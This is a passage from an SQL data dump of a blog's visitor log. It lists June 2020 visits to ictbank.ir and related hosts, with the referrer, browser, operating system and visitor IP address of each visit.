(2854,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.68.160','000',0,1,0),
(2855,'2020-06-06','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','69.39.239.21','000',0,2,0),
(2856,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.236.188','000',0,1,0),
(2857,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.16.22','000',0,1,0),
(2858,'2020-06-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2859,'2020-06-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.16.239','000',0,1,0),
(2860,'2020-06-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.173.154.241','000',0,1,0),
(2861,'2020-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.37.159','000',0,1,0),
(2862,'2020-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.218.124','000',0,1,0),
(2863,'2020-06-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(2864,'2020-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.235.139','000',0,1,0),
(2865,'2020-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.226.11','000',0,1,0),
(2866,'2020-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.243.84.187','000',0,1,0),
(2867,'2020-06-07','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(2868,'2020-06-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2869,'2020-06-07','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(2870,'2020-06-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.187.254.35','000',0,1,0),
(2871,'2020-06-08','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','145.255.21.56','000',0,5,0),
(2872,'2020-06-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(2873,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.185.117','000',0,1,0),
(2874,'2020-06-08','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','54.36.113.142','000',0,1,0),
(2875,'2020-06-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.181.168.170','000',0,1,0),
(2876,'2020-06-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2877,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.100.87.248','000',0,1,0),
(2878,'2020-06-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.141.76','000',0,2,0),
(2879,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2880,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.52.151','000',0,1,0),
(2881,'2020-06-08','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.145.12.137','000',0,1,0),
(2882,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.34.81','000',0,3,0),
(2883,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.41.174','000',0,1,0),
(2884,'2020-06-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.26.204','000',0,1,0),
(2885,'2020-06-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.46.172','000',0,1,0),
(2886,'2020-06-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2887,'2020-06-08','http://www.ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','188.165.180.120','000',0,2,0),
(2888,'2020-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.149.203','000',0,1,0),
(2889,'2020-06-09','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','142.93.139.169','000',0,1,0),
(2890,'2020-06-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(2891,'2020-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.238.132','000',0,1,0),
(2892,'2020-06-09','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.89.201.9','000',0,3,0),
(2893,'2020-06-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','120.79.133.78','000',0,2,0),
(2894,'2020-06-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2895,'2020-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.64.120','000',0,1,0),
(2896,'2020-06-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.33.60','000',0,1,0),
(2897,'2020-06-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2898,'2020-06-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(2899,'2020-06-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.220.149.22','000',0,1,0),
(2900,'2020-06-09','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','188.165.180.120','000',0,2,0),
(2901,'2020-06-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2902,'2020-06-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.138.41','000',0,3,0),
(2903,'2020-06-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2904,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.18.223','000',0,1,0),
(2905,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','158.69.48.28','000',0,1,0),
(2906,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.195.191','000',0,1,0),
(2907,'2020-06-10','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','195.138.88.19','000',0,3,0),
(2908,'2020-06-10','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2909,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.63.69','000',0,1,0),
(2910,'2020-06-10','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','188.163.104.75','000',0,1,0),
(2911,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.209.18','000',0,1,0),
(2912,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.169','000',0,2,0),
(2913,'2020-06-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','207.38.82.18','000',0,1,0),
(2914,'2020-06-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2915,'2020-06-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.88','000',0,1,0),
(2916,'2020-06-10','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(2917,'2020-06-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(2918,'2020-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.253.34','000',0,1,0),
(2919,'2020-06-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.40.191.118','000',0,3,0),
(2920,'2020-06-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(2921,'2020-06-11','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','111.206.250.197','000',0,1,0),
(2922,'2020-06-11','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.10','000',0,1,0),
(2923,'2020-06-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2924,'2020-06-11','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,1,0),
(2925,'2020-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.16.69','000',0,1,0),
(2926,'2020-06-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.220.149.2','000',0,1,0),
(2927,'2020-06-11','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(2928,'2020-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.188.69','000',0,1,0),
(2929,'2020-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.238.85','000',0,1,0),
(2930,'2020-06-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2931,'2020-06-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.68.173','000',0,1,0),
(2932,'2020-06-12','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(2933,'2020-06-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2934,'2020-06-12','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(2935,'2020-06-12','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','52.83.208.239','000',0,3,0),
(2936,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.103.1','000',0,1,0),
(2937,'2020-06-12','http://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwiIrbLO0fvpAhXbFogKHXp3AI04HhAWMAJ6BAgBEAE&url=http%3A%2F%2Fictbank.ir%2Fblog%2Findex.php%2Ftag%2Fora-02374%2F&usg=AOvVaw2x_Is7ewx4Q6Go_81Ec0bx','Internet Explorer','Windows','10.0',NULL,NULL,'','150.183.45.253','000',0,1,0),
(2938,'2020-06-12','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.242','000',0,1,0),
(2939,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.68.201','000',0,1,0),
(2940,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.43.87','000',0,1,0),
(2941,'2020-06-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2942,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.37.123','000',0,1,0),
(2943,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.190.19','000',0,1,0),
(2944,'2020-06-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2945,'2020-06-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','142.93.99.56','000',0,1,0),
(2946,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.227.246.106','000',0,1,0),
(2947,'2020-06-12','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','43.254.11.42','000',0,1,0),
(2948,'2020-06-12','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','221.213.75.18','000',0,1,0),
(2949,'2020-06-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.82.198','000',0,1,0),
(2950,'2020-06-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(2951,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.166.22.77','000',0,1,0),
(2952,'2020-06-13','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2953,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','141.164.48.101','000',0,1,0),
(2954,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.97.38','000',0,1,0),
(2955,'2020-06-13','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.26.68','000',0,2,0),
(2956,'2020-06-13','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.85.103','000',0,1,0),
(2957,'2020-06-13','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','159.89.207.86','000',0,1,0),
(2958,'2020-06-13','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','188.143.169.29','000',0,2,0),
(2959,'2020-06-13','http://ictbank.ir/blog','Chrome','OS X','10.12.3',NULL,NULL,'','218.17.208.165','000',0,1,0),
(2960,'2020-06-13','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(2961,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.5.229','000',0,1,0),
(2962,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','46.101.80.192','000',0,7,0),
(2963,'2020-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','37.192.26.37','000',0,4,0),
(2964,'2020-06-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2965,'2020-06-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(2966,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.43.99','000',0,1,0),
(2967,'2020-06-13','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','84.17.49.198','000',0,2,0),
(2968,'2020-06-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.174.202','000',0,1,0),
(2969,'2020-06-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(2970,'2020-06-13','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.97.135.227','000',0,1,0),
(2971,'2020-06-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','198.74.58.187','000',0,1,0),
(2972,'2020-06-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','31.13.115.119','000',0,1,0),
(2973,'2020-06-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(2974,'2020-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.196.237.221','000',0,1,0),
(2975,'2020-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.31.69','000',0,1,0),
(2976,'2020-06-14','http://ictbank.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','145.255.21.213','000',0,6,0),
(2977,'2020-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.135.152','000',0,1,0),
(2978,'2020-06-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','134.119.176.57','000',0,1,0),
(2979,'2020-06-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.105.175','000',0,1,0),
(2980,'2020-06-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2981,'2020-06-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','45.136.108.89','000',0,1,0),
(2982,'2020-06-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2983,'2020-06-15','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.13.217.92','000',0,2,0),
(2984,'2020-06-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.140','000',0,1,0),
(2985,'2020-06-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.153.232','000',0,1,0),
(2986,'2020-06-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','66.220.149.2','000',0,1,0),
(2987,'2020-06-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.180.222','000',0,1,0),
(2988,'2020-06-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(2989,'2020-06-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(2990,'2020-06-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.85.129','000',0,1,0),
(2991,'2020-06-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.85.98','000',0,1,0),
(2992,'2020-06-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2993,'2020-06-15','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','162.243.126.96','000',0,1,0),
(2994,'2020-06-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','52.212.209.164','000',0,1,0),
(2995,'2020-06-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2996,'2020-06-16','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','161.35.207.242','000',0,1,0),
(2997,'2020-06-16','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','114.116.21.95','000',0,1,0),
(2998,'2020-06-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(2999,'2020-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.105.199','000',0,1,0),
(3000,'2020-06-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3001,'2020-06-16','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','51.38.115.166','000',0,1,0),
(3002,'2020-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.143.152','000',0,1,0),
(3003,'2020-06-16','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(3004,'2020-06-16','http://ictbank.ir/blog/index.php/category/database/mysql/','Firefox','Windows','10.0',NULL,NULL,'','3.92.126.172','000',0,1,0),
(3005,'2020-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.12.50.14','000',0,1,0),
(3006,'2020-06-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.69','000',0,1,0),
(3007,'2020-06-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.155.253','000',0,1,0),
(3008,'2020-06-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3009,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.3.189','000',0,1,0),
(3010,'2020-06-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(3011,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(3012,'2020-06-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','45.227.255.224','000',0,1,0),
(3013,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.205.193','000',0,1,0),
(3014,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','138.197.170.220','000',0,1,0),
(3015,'2020-06-17','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','188.163.104.75','000',0,1,0),
(3016,'2020-06-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3017,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.41.100.57','000',0,1,0),
(3018,'2020-06-17','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','31.171.152.138','000',0,1,0),
(3019,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.119.176','000',0,1,0),
(3020,'2020-06-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(3021,'2020-06-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.141.76','000',0,1,0),
(3022,'2020-06-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.128.41.50','000',0,1,0),
(3023,'2020-06-17','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','1.80.1.30','000',0,1,0),
(3024,'2020-06-17','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','104.248.124.93','000',0,1,0),
(3025,'2020-06-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(3026,'2020-06-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3027,'2020-06-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3028,'2020-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.230.122','000',0,1,0),
(3029,'2020-06-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3030,'2020-06-18','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','69.55.62.22','000',0,1,0),
(3031,'2020-06-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.127.169.2','000',0,1,0),
(3032,'2020-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.117.39','000',0,1,0),
(3033,'2020-06-18','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','80.82.68.173','000',0,1,0),
(3034,'2020-06-18','google.com','Unknown','Unknown','Unknown',NULL,NULL,'','198.199.76.240','000',0,2,0),
(3035,'2020-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.224.163','000',0,1,0),
(3036,'2020-06-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','173.252.95.2','000',0,1,0),
(3037,'2020-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.225.67.93','000',0,1,0),
(3038,'2020-06-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.249.9','000',0,1,0),
(3039,'2020-06-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3040,'2020-06-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(3041,'2020-06-19','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','80.82.68.201','000',0,1,0),
(3042,'2020-06-19','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','116.203.20.40','000',0,2,0),
(3043,'2020-06-19','http://design-arena.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','68.183.104.51','000',0,1,0),
(3044,'2020-06-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,1,0),
(3045,'2020-06-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.66.114.153','000',0,1,0),
(3046,'2020-06-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','41.179.253.229','000',0,3,0),
(3047,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.149.117','000',0,1,0),
(3048,'2020-06-19','http://ictbank.ir/blog','Iceweasel','Linux','Unknown',NULL,NULL,'','78.46.85.253','000',0,1,0),
(3049,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.107.21','000',0,1,0),
(3050,'2020-06-19','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,1,0),
(3051,'2020-06-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3052,'2020-06-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3053,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.187.139','000',0,1,0),
(3054,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.234.156','000',0,1,0),
(3055,'2020-06-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(3056,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','187.60.148.4','000',0,1,0),
(3057,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.165.142','000',0,1,0),
(3058,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.215.124.95','000',0,1,0),
(3059,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.71','000',0,1,0),
(3060,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.185.4','000',0,1,0),
(3061,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.131','000',0,1,0),
(3062,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.140','000',0,1,0),
(3063,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.64','000',0,1,0),
(3064,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.111.154.98','000',0,1,0),
(3065,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.120.67','000',0,1,0),
(3066,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.190.203','000',0,1,0),
(3067,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','109.100.133.107','000',0,1,0),
(3068,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.42.56.158','000',0,1,0),
(3069,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.205.39.172','000',0,1,0),
(3070,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.158.238.246','000',0,1,0),
(3071,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.115.150.103','000',0,1,0),
(3072,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.68.105.248','000',0,1,0),
(3073,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.28','000',0,1,0),
(3074,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.120.222.2','000',0,1,0),
(3075,'2020-06-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.235.43.39','000',0,1,0),
(3076,'2020-06-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(3077,'2020-06-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.99.216.147','000',0,1,0),
(3078,'2020-06-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.211.241','000',0,1,0),
(3079,'2020-06-20','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','59.50.114.234','000',0,3,0),
